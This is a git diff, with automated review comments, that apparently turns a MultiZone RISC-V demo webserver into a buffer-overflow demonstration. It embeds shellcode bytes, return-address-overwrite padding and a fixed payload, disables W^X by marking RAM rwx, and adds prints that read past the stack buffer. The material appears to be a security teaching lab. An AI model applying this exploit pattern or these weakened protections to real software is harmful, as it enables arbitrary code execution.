diff --git a/ArtyImplementation/bsp/X300/multizone.cfg b/ArtyImplementation/bsp/X300/multizone.cfg
index e6db83e217035a3c7b98fea6c06d7fcdcadd103b..6ea50a43fc15c4ab7030efff4a0f387c915cbffd 100644
--- a/ArtyImplementation/bsp/X300/multizone.cfg
+++ b/ArtyImplementation/bsp/X300/multizone.cfg
@@ -7,7 +7,7 @@ Tick = 10 # ms
 Zone = 1
 plic = 21 # ETHERNET
 base = 0x20440000; size = 128K; rwx = rwx # FLASH
- base = 0x80001800; size = 38K; rwx = rw # RAM
+ base = 0x80001800; size = 38K; rwx = rwx # RAM
 base = 0x8000B000; size = 2K; rwx = w # SH BUFF1
 base = 0x8000B800; size = 8K; rwx = w # SH BUFF2
 base = 0x60000000; size = 0x2000; rwx = rw # XEMACLITE
diff --git a/ArtyImplementation/payload_arty.as b/ArtyImplementation/payload_arty.as
new file mode 100644
index 0000000000000000000000000000000000000000..a9d74b00c8b16b6776e41da7914570b3cc6d07c1
--- /dev/null
+++ b/ArtyImplementation/payload_arty.as
@@ -0,0 +1,4 @@
+.text
+ li a0, 0x2044b37c
+ li t3, 0x204408f8
+ jalr t4, t3
diff --git a/ArtyImplementation/zone1/message_handling.h b/ArtyImplementation/zone1/message_handling.h
index ee73250ab7b0453f202b0c03544808d9bb721a49..e61f514b6166c9d790576a5c970d9f495b76eaf3 100644
--- a/ArtyImplementation/zone1/message_handling.h
+++ b/ArtyImplementation/zone1/message_handling.h
@@ -5,9 +5,9 @@
 #include "multizone.h"
 
 #define printf2(format, args...) { /* Multi-part printf() */\
- char *str = malloc(64); \
+ char *str = malloc(128); \
 if (str != NULL){ \
- const int len = snprintf(str, 64, format, ## args); \
+ const int len = snprintf(str, 128, format, ## args); \
 for (int i=0; i<(len/16)+1; i++){ \
 while(!MZONE_SEND(2, (str+16*i))) MZONE_YIELD(); \
 } \
diff --git a/ArtyImplementation/zone1/server_utility.h b/ArtyImplementation/zone1/server_utility.h
index 52f8c585a8c56a41c69b191400a0015f6c670b42..e8612819ad2f3f791447632dd8f2141553446194 100644
--- a/ArtyImplementation/zone1/server_utility.h
+++ b/ArtyImplementation/zone1/server_utility.h
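Review bot: The Zone 1 RAM region is changed from `rw` to `rwx`, which removes the write-xor-execute separation the PMP configuration previously enforced for that zone's stack and heap, so any data written there can also be executed. If this is deliberate for the demonstration, the line should say so, e.g. `base = 0x80001800; size = 38K; rwx = rwx # RAM (demo only: W^X intentionally disabled)`, so the setting is not copied into a configuration that is meant to be hardened. Any non-demo profile should keep this region at `rw`.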
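Review bot: The chunk loop in printf2 still reads past the buffer when the formatted text does not fit, because snprintf returns the length the complete output would have had, not the number of bytes stored: with a 200-character message the loop `for (int i=0; i<(len/16)+1; i++){ \` sends 13 chunks from a 128-byte allocation, and on an snprintf error the negative len still yields one chunk of uninitialized bytes. Clamping the length before the loop fixes this for any buffer size: `const int n = len < 0 ? 0 : (len > 127 ? 127 : len); \` and then `for (int i=0; i<(n/16)+1; i++){ \`. Naming the buffer size once (the two `128` literals) would also keep malloc and snprintf from drifting apart again, as the old 64/64 pair shows they are meant to be the same constant. The closing lines of the macro, including whether str is freed, are outside the hunk.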
@@ -43,9 +43,10 @@ char *attack_me(char *data, uint32_t data_len) {
 // nobody could possibly enter a name longer than 20 characters, so this buffer
 // is definitely large enough
 char message[128];
- //for debugging purpose
- printf2("Framepointer: 0x%x\n", *(uint32_t *)&message[140]);
- printf2("Rücksprungadresse: 0x%x\n", *(uint32_t *)&message[140] - 204);
+ printf2("CD: 0x%08x ", ((uint32_t*)(&message[8])));
+ printf2("F-: 0x%08x ", *((uint32_t*)(&message[136])));
+ printf2("RA: 0x%08x ", *((uint32_t*)(&message[140])));
+ printf2("FP: 0x%08x ", *((uint32_t*)(&message[156])));
 memset(message, 'B', sizeof(message));
 memcpy(message, "Hallo, ", 7);
 
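Review bot: The three added `F-`, `RA` and `FP` prints dereference `message` at offsets 136, 140 and 156, beyond the end of the 128-byte array, and the `CD` print passes a pointer (`(uint32_t*)(&message[8])`, never dereferenced) where `%08x` expects a `uint32_t`; both are undefined behavior, and the reads also happen before the memset below initializes the array. If the purpose is to display the frame layout for the demonstration, wrap the four lines in a debug-only conditional with a comment such as `/* demo only: intentionally reads past message[] to show the frame layout */` so that they are not compiled into anything else, and print the pointer as `(uint32_t)(uintptr_t)` or with `%p` so -Wformat stays clean. The remainder of attack_me is outside the hunk.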
@@ -70,13 +71,54 @@ char *server_request_handler(char *location, enum request_type type, char *data, if(data_len >= 5 && strncmp(data, "name=", 5) == 0) { uint32_t name_len = data_len - 5; name_len = webserver_percent_decode(&data[5], name_len); + data = "X" // padding to align the instructions + + "\x37\xb5\x44\x20" // 0: lui a0,0x2044b + "\x13\x05\xc5\x37" // 4: addi a0,a0,892 # 0x2044b37c + "\x37\x1e\x44\x20" // 8: lui t3,0x20441 + "\x13\x0e\x8e\x8f" // c: addi t3,t3,-1800 # 0x204408f8 + "\xe7\x0e\x0e\x00" // 10: jalr t4,t3 + + + + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "XXXX" // padding to overwrite the return address + "\x2c\x69\x00\x80" // the new frame pointer: 
0x80004ba2 + "\x78\x68\x00\x80"; // the new return address: 0x80006870 + // nobody could possibly enter a name longer than 20 characters, so this buffer // is definitely large enough char *return_string; - return_string = attack_me(&data[5], name_len); + //return_string = attack_me(&data[5], name_len); + return_string = attack_me(data, 137); char* response = http_prepare_response(return_string, strlen(return_string), 200, out_len); - free(return_string); + //free(return_string); return response; } else { return http_prepare_response(RESPONSE_404, strlen(RESPONSE_404), 404, out_len);
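Review bot: Commenting out `free(return_string);` makes every request that reaches this branch leak the buffer attack_me returns, which was heap memory as far as the old code shows, and on a zone with 38K of RAM that is a quick path to allocation failure under repeated requests; if attack_me still returns a heap buffer, restore `free(return_string);`, and if it no longer does, the response path needs a comment explaining why the ownership changed. The new assignment to `data` also discards the client-supplied buffer, so `name_len` and the webserver_percent_decode result two lines above are now computed and never used, and the `data_len >= 5` check no longer guards anything the branch does. `data` now points at a string literal while its type is non-const `char *`, so any write through it inside attack_me would be undefined behavior — I cannot see attack_me's body from here, but a `const`-qualified copy would make that explicit. At minimum a comment should state that this branch now serves a fixed test vector rather than the request, so nobody mistakes it for the production handler.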